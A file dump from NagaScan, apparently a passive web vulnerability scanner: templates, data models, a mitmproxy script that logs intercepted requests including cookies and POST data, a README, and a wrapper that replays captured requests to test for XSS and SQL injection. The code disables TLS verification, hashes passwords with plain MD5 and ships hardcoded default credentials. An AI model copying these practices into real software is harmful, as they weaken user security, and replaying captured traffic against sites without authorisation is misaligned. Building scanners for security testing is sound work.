56 |             <p><a href="/" class="uk-icon-button"><i class="uk-icon-adn"></i></a> <a href="/">NagaScan v1.0</a></p>
57 | 
58 |             <form id="form-signin" v-on="submit: submit" class="uk-panel uk-panel-box uk-form">
59 |                 <div class="uk-alert uk-alert-danger uk-hidden"></div>
60 |                 <div class="uk-form-row">
61 |                     <div class="uk-form-icon uk-width-1-1">
62 |                         <i class="uk-icon-envelope-o"></i>
63 |                         <input v-model="email" name="email" type="text" placeholder="Email" maxlength="50" class="uk-width-1-1 uk-form-large">
64 |                     </div>
65 |                 </div>
66 |                 <div class="uk-form-row">
67 |                     <div class="uk-form-icon uk-width-1-1">
68 |                         <i class="uk-icon-lock"></i>
69 |                         <input v-model="password" name="password" type="password" placeholder="Password" maxlength="50" class="uk-width-1-1 uk-form-large">
70 |                     </div>
71 |                 </div>
72 |                 <div class="uk-form-row">
73 |                     <button type="submit" class="uk-width-1-1 uk-button uk-button-primary uk-button-large"><i class="uk-icon-sign-in"></i> Sign In</button>
74 |                 </div>
75 |                 <div class="uk-form-row uk-text-small">
76 |                     <label class="uk-float-left"><input v-model="remember" type="checkbox"> Remember Me</label>
77 |                 </div>
78 |             </form>
79 |         </div>
80 |     </div>
81 | </body>
82 | </html>
83 | 


--------------------------------------------------------------------------------
/www/templates/register.html:
--------------------------------------------------------------------------------
 1 | {% extends '__base__.html' %}
 2 | 
 3 | {% block title %}Sign Up{% endblock %}
 4 | 
 5 | {% block beforehead %}
 6 | 
 7 | <script>
 8 | 
 9 | function validateEmail(email) {
10 |     var re = /^[a-z0-9\.\-\_]+\@[a-z0-9\-\_]+(\.[a-z0-9\-\_]+){1,4}$/;
11 |     return re.test(email.toLowerCase());
12 | }
13 | 
14 | $(function () {
15 |     var vm = new Vue({
16 |         el: '#form-register',
17 |         data: {
18 |             name: '',
19 |             email: '',
20 |             password1: '',
21 |             password2: ''
22 |         },
23 |         methods: {
24 |             submit: function (event) {
25 |                 event.preventDefault();
26 |                 if (! this.name.trim()) {
27 |                     return showError('Please input username');
28 |                 }
29 |                 if (! validateEmail(this.email.trim().toLowerCase())) {
30 |                     return showError('Please input correct email');
31 |                 }
32 |                 if (this.password1.length < 6) {
33 |                     return showError('The length of password is at least 6');
34 |                 }
35 |                 if (this.password1 !== this.password2) {
36 |                     return showError('The passwords you typed do not match');
37 |                 }
38 |                 startLoading();
39 |                 postApi('/api/users', {
40 |                     name: this.name,
41 |                     email: this.email.trim().toLowerCase(),
42 |                     password: CryptoJS.MD5(this.password1).toString(),
43 |                 }, function (err, r) {
44 |                     if (err) {
45 |                         showError(err);
46 |                     }
47 |                     else {
48 |                         return location.assign('/');
49 |                     }
50 |                     stopLoading();
51 |                 });
52 |             }
53 |         }
54 |     });
55 | });
56 | 
57 | </script>
58 | 
59 | {% endblock %}
60 | 
61 | {% block content %}
62 | 
63 |     <div class="uk-width-2-3">
64 |         <h1>欢迎注册！</h1>
65 |         <form id="form-register" v-on="submit: submit" class="uk-form uk-form-stacked">
66 |             <div class="uk-alert uk-alert-danger uk-hidden"></div>
67 |             <div class="uk-form-row">
68 |                 <label class="uk-form-label">Username:</label>
69 |                 <div class="uk-form-controls">
70 |                     <input v-model="name" type="text" maxlength="50" placeholder="Username" class="uk-width-1-1">
71 |                 </div>
72 |             </div>
73 |             <div class="uk-form-row">
74 |                 <label class="uk-form-label">Email:</label>
75 |                 <div class="uk-form-controls">
76 |                     <input v-model="email" type="text" maxlength="50" placeholder="your-name@example.com" class="uk-width-1-1">
77 |                 </div>
78 |             </div>
79 |             <div class="uk-form-row">
80 |                 <label class="uk-form-label">Password:</label>
81 |                 <div class="uk-form-controls">
82 |                     <input v-model="password1" type="password" maxlength="50" placeholder="Password" class="uk-width-1-1">
83 |                 </div>
84 |             </div>
85 |             <div class="uk-form-row">
86 |                 <label class="uk-form-label">Verify:</label>
87 |                 <div class="uk-form-controls">
88 |                     <input v-model="password2" type="password" maxlength="50" placeholder="Verify" class="uk-width-1-1">
89 |                 </div>
90 |             </div>
91 |             <div class="uk-form-row">
92 |                 <button type="submit" class="uk-button uk-button-primary"><i class="uk-icon-user"></i> Sign Up</button>
93 |             </div>
94 |         </form>
95 |     </div>
96 | 
97 | {% endblock %}
98 | 


--------------------------------------------------------------------------------
/www/models.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | __author__ = 'avfisher'
  5 | 
  6 | '''
  7 | Models for user, blog, comment.
  8 | '''
  9 | 
 10 | import time, uuid
 11 | 
 12 | from transwarp.db import next_id
 13 | from transwarp.orm import Model, StringField, BooleanField, FloatField, TextField, DatetimeField, LongTextField
 14 | 
 15 | def next_id():
 16 |     return '%015d%s000' % (int(time.time() * 1000), uuid.uuid4().hex)
 17 | 
 18 | class User(Model):
 19 |     __table__ = 'users'
 20 | 
 21 |     id = StringField(primary_key=True, default=next_id, ddl='varchar(50)')
 22 |     email = StringField(updatable=False, ddl='varchar(50)')
 23 |     password = StringField(ddl='varchar(50)')
 24 |     admin = BooleanField()
 25 |     name = StringField(ddl='varchar(50)')
 26 |     image = StringField(ddl='varchar(500)')
 27 |     created_at = FloatField(updatable=False, default=time.time)
 28 | 
 29 | class Request(Model):
 30 |     __table__ = 'requests'
 31 | 
 32 |     id = StringField(primary_key=True, ddl='int(32)')
 33 |     rid = StringField(updatable=False, ddl='varchar(64)')
 34 |     ip = StringField(ddl='varchar(40)')
 35 |     port = StringField(ddl='varchar(40)')
 36 |     protocol = StringField(ddl='varchar(40)')
 37 |     host = StringField(ddl='varchar(255)')
 38 |     method = StringField(ddl='varchar(40)')
 39 |     user_agent = TextField()
 40 |     accept = StringField(ddl='varchar(255)')
 41 |     accept_language = StringField(ddl='varchar(255)')
 42 |     accept_encoding = StringField(ddl='varchar(255)')
 43 |     cookie = TextField()
 44 |     referer = TextField()
 45 |     content_type = StringField(ddl='varchar(255)')
 46 |     post_data = TextField()
 47 |     path = TextField()
 48 |     scan_xss = StringField(ddl='int(4)')
 49 |     scan_sqli = StringField(ddl='int(4)')
 50 |     result_xss = StringField(ddl='varchar(40)')
 51 |     result_sqli = StringField(ddl='varchar(40)')
 52 |     poc_xss = TextField()
 53 |     poc_sqli = TextField()
 54 |     time = StringField(ddl='varchar(255)')
 55 |     update_time = StringField(ddl='varchar(255)')
 56 | 
 57 | class Response(Model):
 58 |     __table__ = 'responses'
 59 | 
 60 |     id = StringField(primary_key=True, ddl='int(32)')
 61 |     rid = StringField(updatable=False, ddl='varchar(64)')
 62 |     response_xss = LongTextField()
 63 |     response_fi = LongTextField()
 64 |     update_time = StringField(ddl='varchar(255)')
 65 | 
 66 | class ExclusionScan(Model):
 67 |     __table__ = 'exclusions_scan'
 68 | 
 69 |     id = StringField(primary_key=True, ddl='int(50)')
 70 |     type = StringField(ddl='int(4)')
 71 |     ip = StringField(ddl='varchar(40)')
 72 |     port = StringField(ddl='varchar(40)')
 73 |     protocol = StringField(ddl='varchar(40)')
 74 |     host = StringField(ddl='varchar(255)')
 75 |     method = StringField(ddl='varchar(40)')
 76 |     user_agent = TextField()
 77 |     accept = StringField(ddl='varchar(255)')
 78 |     accept_language = StringField(ddl='varchar(255)')
 79 |     accept_encoding = StringField(ddl='varchar(255)')
 80 |     cookie = TextField()
 81 |     referer = TextField()
 82 |     content_type = StringField(ddl='varchar(255)')
 83 |     post_data = TextField()
 84 |     path = TextField()
 85 |     update_time = StringField(ddl='varchar(255)')
 86 | 
 87 | class ExclusionParse(Model):
 88 |     __table__ = 'exclusions_parse'
 89 | 
 90 |     id = StringField(primary_key=True, ddl='int(50)')
 91 |     exclusion = StringField(ddl='varchar(255)')
 92 |     update_time = StringField(ddl='varchar(255)')
 93 | 
 94 | class ExclusionCookie(Model):
 95 |     __table__ = 'exclusions_cookie'
 96 | 
 97 |     id = StringField(primary_key=True, ddl='int(50)')
 98 |     exclusion = TextField()
 99 |     update_time = StringField(ddl='varchar(255)')
100 | 
101 | class Sqlmap(Model):
102 |     __table__ = 'sqlmap'
103 | 
104 |     id = StringField(primary_key=True, default=next_id, ddl='varchar(50)')
105 |     ip = StringField(ddl='varchar(40)')
106 |     port = StringField(ddl='varchar(40)')
107 |     status = StringField(ddl='int(4)')
108 |     update_time = StringField(ddl='varchar(255)')
109 | 


--------------------------------------------------------------------------------
/www/templates/__base__.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |     <meta charset="utf-8" />
 5 |     {% block meta %}<!-- block meta  -->{% endblock %}
 6 |     <title>{% block title %} ? {% endblock %} - NagaScan v1.0</title>
 7 |     <!--[if lt IE 9]>
 8 |     <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
 9 |     <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
10 |     <![endif]-->
11 |     <link rel="stylesheet" href="/static/css/uikit.min.css">
12 |     <link rel="stylesheet" href="/static/css/uikit.gradient.min.css">
13 |     <link rel="stylesheet" href="/static/css/nagascan.css" />
14 |     <script src="/static/js/jquery.min.js"></script>
15 |     <script src="/static/js/md5.js"></script>
16 |     <script src="/static/js/uikit.min.js"></script>
17 |     <script src="/static/js/sticky.min.js"></script>
18 |     <script src="/static/js/vue.min.js"></script>
19 |     <script src="/static/js/nagascan.js"></script>
20 |     {% block beforehead %}<!-- before head  -->{% endblock %}
21 | </head>
22 | <body>
23 |     <nav class="uk-navbar uk-navbar-attached uk-margin-bottom">
24 |         <div class="uk-container uk-container-center">
25 |             <a href="/" class="uk-navbar-brand">NagaScan v1.0</a>
26 |             <ul class="uk-navbar-nav">
27 |                 <li data-url="blogs"><a href="/"><i class="uk-icon-home"></i> Home</a></li>
28 |                 <li data-url="blogs"><a href="/manage/"><i class="uk-icon-cog"></i> Manage</a></li>
29 |             </ul>
30 |             <div class="uk-navbar-flip">
31 |                 <ul class="uk-navbar-nav">
32 |                 {% if user %}
33 |                     <li class="uk-parent" data-uk-dropdown>
34 |                         <a href="#0"><i class="uk-icon-user"></i> {{ user.name }}</a>
35 |                         <div class="uk-dropdown uk-dropdown-navbar">
36 |                             <ul class="uk-nav uk-nav-navbar">
37 |                                 <li><a href="/signout"><i class="uk-icon-sign-out"></i> Sign Out</a></li>
38 |                             </ul>
39 |                         </div>
40 |                     </li>
41 |                 {% else %}
42 |                     <li><a href="/signin"><i class="uk-icon-sign-in"></i> Sign In</a></li>
43 |                     <li><a href="/register"><i class="uk-icon-edit"></i> Sign Up</a></li>
44 |                 {% endif %}
45 |                 </ul>
46 |             </div>
47 |         </div>
48 |     </nav>
49 | 
50 |     <div class="uk-container uk-container-center">
51 |         <div class="uk-grid">
52 |             <!-- content -->
53 |             <div class="uk-width-1-1 uk-margin-bottom">
54 |                 <div class="uk-panel uk-panel-box">
55 |                     <ul class="uk-breadcrumb">
56 |                         <li><a href="/manage/requests">Requests</a></li>
57 |                         <li><a href="/manage/vulns/xss/list">Vulnerabilities</a></li>
58 |                         <li><a href="/manage/exclusions/parse/view">Configuration</a></li>
59 |                         <li><a href="/manage/users">Users</a></li>
60 |                     </ul>
61 |                 </div>
62 |             </div>
63 |             {% block content %}
64 |             {% endblock %}
65 |             <!-- // content -->
66 |         </div>
67 |     </div>
68 | 
69 |     <div class="uk-margin-large-top" style="background-color:#eee; border-top:1px solid #ccc;">
70 |         <div class="uk-container uk-container-center uk-text-center">
71 |             <div class="uk-panel uk-margin-top uk-margin-bottom">
72 |                 <p>
73 |                     <a target="_blank" href="https://github.com/brianwrf" class="uk-icon-button uk-icon-github"></a>
74 |                     <a target="_blank" href="http://avfisher.win/" class="uk-icon-button uk-icon-book"></a>
75 |                 </p>
76 |                 <p>Powered by <a href="http://avfisher.win/">NagaScan</a>. Copyright &copy; 2017.</p>
77 |                 <p><a href="http://avfisher.win/" target="_blank">avfisher</a>. All rights reserved.</p>
78 |             </div>
79 | 
80 |         </div>
81 |     </div>
82 | </body>
83 | </html>
84 | 


--------------------------------------------------------------------------------
/proxy/proxy_mitmproxy.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ Capture mitmproxy Request Logs into a file
  4 | 
  5 | This module is used to capture mitmproxy Requests and write to a file.
  6 | 
  7 | Usage:
  8 |     mitmdump -p 443 -s "proxy_mitmproxy.py logs.txt"
  9 | 
 10 | """
 11 | 
 12 | import sys
 13 | import time
 14 | 
 15 | def get_request_info(flow, item):
 16 |     request_item = ""
 17 |     try:
 18 |         if item == "port" and flow.request.port:
 19 |             request_item = flow.request.port
 20 |     except Exception:
 21 |         pass
 22 |     try:
 23 |         if item == "protocol" and flow.request.scheme:
 24 |             request_item = flow.request.scheme
 25 |     except Exception:
 26 |         pass
 27 |     try:
 28 |         if item == "path" and flow.request.path:
 29 |             request_item = flow.request.path
 30 |     except Exception:
 31 |         pass
 32 |     try:
 33 |         if item == "host" and flow.request.host:
 34 |             request_item = flow.request.host
 35 |     except Exception:
 36 |         pass
 37 |     try:
 38 |         if item == "method" and flow.request.method:
 39 |             request_item = flow.request.method
 40 |     except Exception:
 41 |         pass
 42 |     try:
 43 |         if item == "post_data" and flow.request.content:
 44 |             request_item = flow.request.content
 45 |     except Exception:
 46 |         pass
 47 |     try:
 48 |         if item == "time" and flow.request.timestamp_start:
 49 |             request_item = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(flow.request.timestamp_start))
 50 |     except Exception:
 51 |         pass
 52 |     try:
 53 |         if item == "accept" and flow.request.headers['accept']:
 54 |             request_item = flow.request.headers['accept']
 55 |     except Exception:
 56 |         pass
 57 |     try:
 58 |         if item == "accept_language" and flow.request.headers['accept-language']:
 59 |             request_item = flow.request.headers['accept-language']
 60 |     except Exception:
 61 |         pass
 62 |     try:
 63 |         if item == "accept_encoding" and flow.request.headers['accept-encoding']:
 64 |             request_item = flow.request.headers['accept-encoding']
 65 |     except Exception:
 66 |         pass
 67 |     try:
 68 |         if item == "cookie" and flow.request.headers['cookie']:
 69 |             request_item = flow.request.headers['cookie']
 70 |     except Exception:
 71 |         pass
 72 |     try:
 73 |         if item == "referer" and flow.request.headers['referer']:
 74 |             request_item = flow.request.headers['referer']
 75 |     except Exception:
 76 |         pass
 77 |     try:
 78 |         if item == "user_agent" and flow.request.headers['user-agent']:
 79 |             request_item = flow.request.headers['user-agent']
 80 |     except Exception:
 81 |         pass
 82 |     try:
 83 |         if item == "content_type" and flow.request.headers['content-type']:
 84 |             request_item = flow.request.headers['content-type']
 85 |     except Exception:
 86 |         pass
 87 |     return request_item
 88 | 
 89 | def request(flow):
 90 |     request = {}
 91 |     request['time'] = get_request_info(flow, 'time')
 92 |     request['protocol'] = get_request_info(flow, 'protocol')
 93 |     request['host'] = get_request_info(flow, 'host')
 94 |     request['path'] = get_request_info(flow, 'path')
 95 |     request['method'] = get_request_info(flow, 'method')
 96 |     request['port'] = get_request_info(flow, 'port')
 97 |     request['user_agent'] = get_request_info(flow, 'user_agent')
 98 |     request['cookie'] = get_request_info(flow, 'cookie')
 99 |     request['referer'] = get_request_info(flow, 'referer')
100 |     request['content_type'] = get_request_info(flow, 'content_type')
101 |     request['accept'] = get_request_info(flow, 'accept')
102 |     request['accept_language'] = get_request_info(flow, 'accept_language')
103 |     request['accept_encoding'] = get_request_info(flow, 'accept_encoding')
104 |     request['post_data'] = get_request_info(flow, 'post_data')
105 | 
106 |     log_file_name = sys.argv[1]
107 |     log_file = open(log_file_name, 'a')
108 |     for k, v in request.items():
109 |         log_file.write("%s: %s\n"%(k,v))
110 |     log_file.write("======================================================\n\n\n")
111 |     log_file.close()
112 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # NagaScan
  2 | ## What is NagaScan
  3 | NagaScan is a distributed passive vulnerability scanner for Web application.
  4 | 
  5 | ## What NagaScan do
  6 | NagaScan currently support some common Web application vulnerabilities, e.g. XSS, SQL Injection, File Inclusion etc
  7 | 
  8 | ## How NagaScan work
  9 | Config a proxy, e.g. Web Browser proxy or mobile Wi-Fi proxy, the traffic (including requests headers, cookies, post data, URLs, etc) will be mirrored and parsed into our central database, then NagaScan will be automatically assigned to distributed scanners to scan the common web application vulnerabilities.
 10 | 
 11 | # Design
 12 | ![NagaScan](http://avfisher.win/wp-content/uploads/2017/03/20170313112539_66270.png)
 13 | 
 14 | # Requirements
 15 | ## Web Console
 16 | * sudo pip install mysql-connector
 17 | * sudo pip install jinja2
 18 | * sudo pip install bleach
 19 | 
 20 | ## Scanner
 21 | * sudo apt-get install python-pip python-dev libmysqlclient-dev
 22 | * sudo pip install requests
 23 | * sudo pip install MySQL-python
 24 | * sudo pip install -U selenium
 25 | * sudo apt-get install libfontconfig
 26 | 
 27 | ## Proxy
 28 | * sudo apt-get install python-pip python-dev libmysqlclient-dev
 29 | * sudo pip install MySQL-python
 30 | 
 31 | # Installation & Configuration
 32 | 
 33 | ## Database
 34 | * Install MySQL and create a db user and password, e.g. `root/toor`
 35 | * Create database for NagaScan by using command `source schema.sql`
 36 | 
 37 | ## Web Console
 38 | * Modify `www/config_override.py` with your own DB configuration for Web console
 39 | ```
 40 | configs = {
 41 |     'db': {
 42 |         'host': '127.0.0.1',
 43 |         'user': 'root',
 44 |         'password': 'toor'
 45 |     }
 46 | }
 47 | ```
 48 | * Run `sudo python www/wsgiapp.py` to start Web console
 49 | 
 50 | ## Scanner
 51 | * Modify `scanner/lib/db_operation.py` with your own DB configuration for Scanner
 52 | ```
 53 | def db_conn():
 54 |     try:
 55 |         user = "root"
 56 |         pwd = "toor"
 57 |         hostname = "127.0.0.1"
 58 | ```
 59 | * Install PhantomJs
 60 |   * Linux 64-bit:
 61 |     * wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-x86_64.tar.bz2
 62 |     * tar -jxvf phantomjs-2.1.1-linux-x86_64.tar.bz2
 63 |   * Linux 32-bit:
 64 |     * wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-2.1.1-linux-i686.tar.bz2
 65 |     * tar -jxvf phantomjs-2.1.1-linux-i686.tar.bz2
 66 | * Modify `scanner/lib/hack_requests.py` in line 28 as below
 67 | ```
 68 | self.executable_path='[Your Own Phantomjs Binary Path]' # e.g. /home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs
 69 | ```
 70 | * Run below commands to start Scanner
 71 |   * `python scanner/scan_fi.py` to scan File Inclusion
 72 |   * `python scanner/scan_xss.py` to scan XSS
 73 |   * `python scanner/scan_sqli.py` to scan SQL injection
 74 | 
 75 | ## Proxy & Parser
 76 | * Install MitmProxy
 77 |   * Ubuntu 16.04 (Preferred):
 78 |     * sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
 79 |     * sudo pip3 install mitmproxy
 80 |   * Ubuntu 14.04:
 81 |     * sudo apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
 82 |     * sudo pip install "mitmproxy==0.18.2"
 83 |   * MacOS:
 84 |     * brew install python3
 85 |     * brew install mitmproxy
 86 | * Run `mitmdump -p 443 -s "proxy/proxy_mitmproxy.py /tmp/logs.txt"` to start Proxy
 87 | * Modify `parser/lib/db_operation.py` with your own DB configuration for Parser
 88 | ```
 89 | def db_conn():
 90 |     try:
 91 |         user = "root"
 92 |         pwd = "toor"
 93 |         hostname = "127.0.0.1"
 94 | ```
 95 | * Run `python parser/parser_mitmproxy.py /tmp/logs.txt` to start Parser
 96 | 
 97 | # Usage
 98 | 
 99 | * Access to Web Console with the default username and password (*nagascan@example.com/Naga5c@n*) to config exclusions and add SQLMAP server
100 | ![webconsole](https://github.com/brianwrf/NagaScan/blob/master/picture/webconsole.jpeg)
101 | ![exclusion_1](https://github.com/brianwrf/NagaScan/blob/master/picture/exclusion_1.jpeg)
102 | ![exclusion_2](https://github.com/brianwrf/NagaScan/blob/master/picture/exclusion_2.jpeg)
103 | ![sqlmapserver](https://github.com/brianwrf/NagaScan/blob/master/picture/sqlmapserver.jpeg)
104 | * Install MitmProxy certificates for Browser or Mobile per [Instruction](http://docs.mitmproxy.org/en/stable/certinstall.html)
105 | * Add a proxy you created in your Web Browser or Mobile Wi-Fi
106 | * Just browse websites from Browser or use APPs from Mobile whatever you like
107 | 


--------------------------------------------------------------------------------
/www/apis.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | # -*- coding: utf-8 -*-
  3 | 
  4 | __author__ = 'avfisher'
  5 | 
  6 | '''
  7 | JSON API definition.
  8 | '''
  9 | 
 10 | import re, json, logging, functools
 11 | 
 12 | from transwarp.web import ctx
 13 | 
 14 | class Page(object):
 15 |     '''
 16 |     Page object for display pages.
 17 |     '''
 18 | 
 19 |     def __init__(self, item_count, page_index=1, page_size=15):
 20 |         '''
 21 |         Init Pagination by item_count, page_index and page_size.
 22 | 
 23 |         >>> p1 = Page(100, 1)
 24 |         >>> p1.page_count
 25 |         10
 26 |         >>> p1.offset
 27 |         0
 28 |         >>> p1.limit
 29 |         10
 30 |         >>> p2 = Page(90, 9, 10)
 31 |         >>> p2.page_count
 32 |         9
 33 |         >>> p2.offset
 34 |         80
 35 |         >>> p2.limit
 36 |         10
 37 |         >>> p3 = Page(91, 10, 10)
 38 |         >>> p3.page_count
 39 |         10
 40 |         >>> p3.offset
 41 |         90
 42 |         >>> p3.limit
 43 |         10
 44 |         '''
 45 |         self.item_count = item_count
 46 |         self.page_size = page_size
 47 |         self.page_count = item_count // page_size + (1 if item_count % page_size > 0 else 0)
 48 |         if (item_count == 0) or (page_index < 1) or (page_index > self.page_count):
 49 |             self.offset = 0
 50 |             self.limit = 0
 51 |             self.page_index = 1
 52 |         else:
 53 |             self.page_index = page_index
 54 |             self.offset = self.page_size * (page_index - 1)
 55 |             self.limit = self.page_size
 56 |         self.has_next = self.page_index < self.page_count
 57 |         self.has_previous = self.page_index > 1
 58 | 
 59 |     def __str__(self):
 60 |         return 'item_count: %s, page_count: %s, page_index: %s, page_size: %s, offset: %s, limit: %s' % (self.item_count, self.page_count, self.page_index, self.page_size, self.offset, self.limit)
 61 | 
 62 |     __repr__ = __str__
 63 | 
 64 | def _dump(obj):
 65 |     if isinstance(obj, Page):
 66 |         return {
 67 |             'page_index': obj.page_index,
 68 |             'page_count': obj.page_count,
 69 |             'item_count': obj.item_count,
 70 |             'has_next': obj.has_next,
 71 |             'has_previous': obj.has_previous
 72 |         }
 73 |     raise TypeError('%s is not JSON serializable' % obj)
 74 | 
 75 | def dumps(obj):
 76 |     return json.dumps(obj, default=_dump)
 77 | 
 78 | class APIError(StandardError):
 79 |     '''
 80 |     the base APIError which contains error(required), data(optional) and message(optional).
 81 |     '''
 82 |     def __init__(self, error, data='', message=''):
 83 |         super(APIError, self).__init__(message)
 84 |         self.error = error
 85 |         self.data = data
 86 |         self.message = message
 87 | 
 88 | class APIValueError(APIError):
 89 |     '''
 90 |     Indicate the input value has error or invalid. The data specifies the error field of input form.
 91 |     '''
 92 |     def __init__(self, field, message=''):
 93 |         super(APIValueError, self).__init__('value:invalid', field, message)
 94 | 
 95 | class APIResourceNotFoundError(APIError):
 96 |     '''
 97 |     Indicate the resource was not found. The data specifies the resource name.
 98 |     '''
 99 |     def __init__(self, field, message=''):
100 |         super(APIResourceNotFoundError, self).__init__('value:notfound', field, message)
101 | 
102 | class APIPermissionError(APIError):
103 |     '''
104 |     Indicate the api has no permission.
105 |     '''
106 |     def __init__(self, message=''):
107 |         super(APIPermissionError, self).__init__('permission:forbidden', 'permission', message)
108 | 
109 | def api(func):
110 |     '''
111 |     A decorator that makes a function to json api, makes the return value as json.
112 | 
113 |     @app.route('/api/test')
114 |     @api
115 |     def api_test():
116 |         return dict(result='123', items=[])
117 |     '''
118 |     @functools.wraps(func)
119 |     def _wrapper(*args, **kw):
120 |         try:
121 |             r = dumps(func(*args, **kw))
122 |         except APIError, e:
123 |             r = json.dumps(dict(error=e.error, data=e.data, message=e.message))
124 |         except Exception, e:
125 |             logging.exception(e)
126 |             r = json.dumps(dict(error='internalerror', data=e.__class__.__name__, message=e.message))
127 |         ctx.response.content_type = 'application/json'
128 |         return r
129 |     return _wrapper
130 | 
131 | if __name__=='__main__':
132 |     import doctest
133 |     doctest.testmod()
134 | 


--------------------------------------------------------------------------------
/scanner/lib/hack_requests.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | 
  3 | """ Hack Requests
  4 | 
  5 | This module is a dedicated requests lib that supports cookie, headers, get/post, etc.
  6 | 
  7 | """
  8 | 
  9 | import requests
 10 | import json
 11 | from selenium import webdriver
 12 | 
 13 | 
 14 | class HackRequests(object):
 15 |     def __init__(self, request_info, lib = 'REQUESTS'):
 16 |         self.request_info = request_info
 17 |         self.lib = lib
 18 |         self.url = "{}://{}{}".format(self.request_info['protocol'], self.request_info['host'], self.request_info['path'])
 19 |         self.TIME_OUT = 10 # timeout of requests
 20 | 
 21 |         # configurations for PhantomJS
 22 |         self.headers = {'User-Agent': self.request_info['user_agent'],
 23 |                  'Accept': self.request_info['accept'],
 24 |                  'Accept-Language': self.request_info['accept_language'],
 25 |                  'Accept-Encoding': self.request_info['accept_encoding'],
 26 |                  'Cookie': self.request_info['cookie'],
 27 |                  'Referer': self.request_info['referer']}
 28 |         self.executable_path='/home/ubuntu/phantomjs-2.1.1-linux-x86_64/bin/phantomjs' # Modify to your own phantomjs binary path
 29 |         self.service_args=[]
 30 |         self.service_args.append('--load-images=no')
 31 |         self.service_args.append('--disk-cache=yes')
 32 |         self.service_args.append('--ignore-ssl-errors=true')
 33 |         self.driver = self.init_phantomjs_driver(executable_path = self.executable_path, service_args = self.service_args)
 34 | 
 35 |     def get_request(self):
 36 |         if self.lib == "REQUESTS":
 37 |             headers = {'User-Agent': self.request_info['user_agent'],
 38 |                      'Accept': self.request_info['accept'],
 39 |                      'Accept-Language': self.request_info['accept_language'],
 40 |                      'Accept-Encoding': self.request_info['accept_encoding'],
 41 |                      'Referer': self.request_info['referer']}
 42 |             try:
 43 |                 if self.request_info['cookie']:
 44 |                     cookies = self.get_cookie()
 45 |                     r = requests.get(self.url, headers = headers, cookies = cookies, timeout = self.TIME_OUT, verify=False).content
 46 |                 else:
 47 |                     r = requests.get(self.url, headers = headers, timeout = self.TIME_OUT, verify=False).content
 48 |             except Exception, e:
 49 |                 print str(e)
 50 |                 r = ""
 51 |             return r
 52 |         elif self.lib == "PHANTOMJS":
 53 |             try:
 54 |                 self.driver.get(self.url)
 55 |                 r = self.driver.page_source
 56 |             except Exception, e:
 57 |                 print str(e)
 58 |                 r = ""
 59 |             return r
 60 | 
 61 |     def post_request(self):
 62 |         data = self.get_post_data()
 63 |         headers = {'User-Agent': self.request_info['user_agent'],
 64 |                  'Accept': self.request_info['accept'],
 65 |                  'Accept-Language': self.request_info['accept_language'],
 66 |                  'Accept-Encoding': self.request_info['accept_encoding'],
 67 |                  'Referer': self.request_info['referer']}
 68 |         try:
 69 |             if self.request_info['cookie']:
 70 |                 cookies = self.get_cookie()
 71 |                 r = requests.post(self.url, data = data, headers = headers, cookies = cookies, timeout = self.TIME_OUT, verify=False).content
 72 |             else:
 73 |                 r = requests.post(self.url, data = data, headers = headers, timeout = self.TIME_OUT, verify=False).content
 74 |         except Exception, e:
 75 |             print str(e)
 76 |             r = ""
 77 |         return r
 78 | 
 79 |     def get_cookie(self):
 80 |         cookies = {}
 81 |         for line in self.request_info['cookie'].split(';'):
 82 |             name, value = line.strip().split('=', 1) # 1 means only split one time
 83 |             cookies[name] = value
 84 | 
 85 |         return cookies
 86 | 
 87 |     def get_post_data(self):
 88 |         if "application/x-www-form-urlencoded" in self.request_info['content_type']:
 89 |             post_data = {}
 90 |             for line in self.request_info['post_data'].split('&'):
 91 |                 name, value = line.strip().split('=', 1) # 1 means only split one time
 92 |                 post_data[name] = value
 93 |         elif "application/json" in self.request_info['content_type']:
 94 |             post_data = json.dumps(self.request_info['post_data'])
 95 |         else:
 96 |             post_data = ""
 97 | 
 98 |         return post_data
 99 | 
100 |     def init_phantomjs_driver(self, *args, **kwargs):
101 |         for key, value in self.headers.iteritems():
102 |             webdriver.DesiredCapabilities.PHANTOMJS['phantomjs.page.customHeaders.{}'.format(key)] = value
103 |         driver =  webdriver.PhantomJS(*args, **kwargs)
104 |         driver.set_page_load_timeout(self.TIME_OUT)
105 |         return driver
106 | 


--------------------------------------------------------------------------------
/www/templates/manage_request_list.html:
--------------------------------------------------------------------------------
  1 | {% extends '__base__.html' %}
  2 | 
  3 | {% block title %}Requests{% endblock %}
  4 | 
  5 | {% block beforehead %}
  6 | 
  7 | <script>
  8 | 
  9 | function initVM(data) {
 10 |     $('#div-requests').show();
 11 |     var vm = new Vue({
 12 |         el: '#div-requests',
 13 |         data: {
 14 |             requests: data.requests,
 15 |             page: data.page
 16 |         },
 17 |         methods: {
 18 |             previous: function () {
 19 |                 gotoPage(this.page.page_index - 1);
 20 |             },
 21 |             next: function () {
 22 |                 gotoPage(this.page.page_index + 1);
 23 |             },
 24 | 
 25 |             view_request: function (request) {
 26 |                 var url = '/manage/requests/' + request.rid + '/view';
 27 |                 location.href = url;
 28 |             }
 29 |         }
 30 |     });
 31 | }
 32 | 
 33 | $(function() {
 34 |     getApi('/api/requests?page={{ page_index }}', function (err, results) {
 35 |         if (err) {
 36 |             return showError(err);
 37 |         }
 38 |         $('#div-loading').hide();
 39 |         initVM(results);
 40 |     });
 41 | });
 42 | 
 43 | </script>
 44 | 
 45 | {% endblock %}
 46 | 
 47 | {% block content %}
 48 | 
 49 |     <div class="uk-width-1-1">
 50 |         <div class="uk-alert uk-alert-danger uk-hidden"></div>
 51 |     </div>
 52 | 
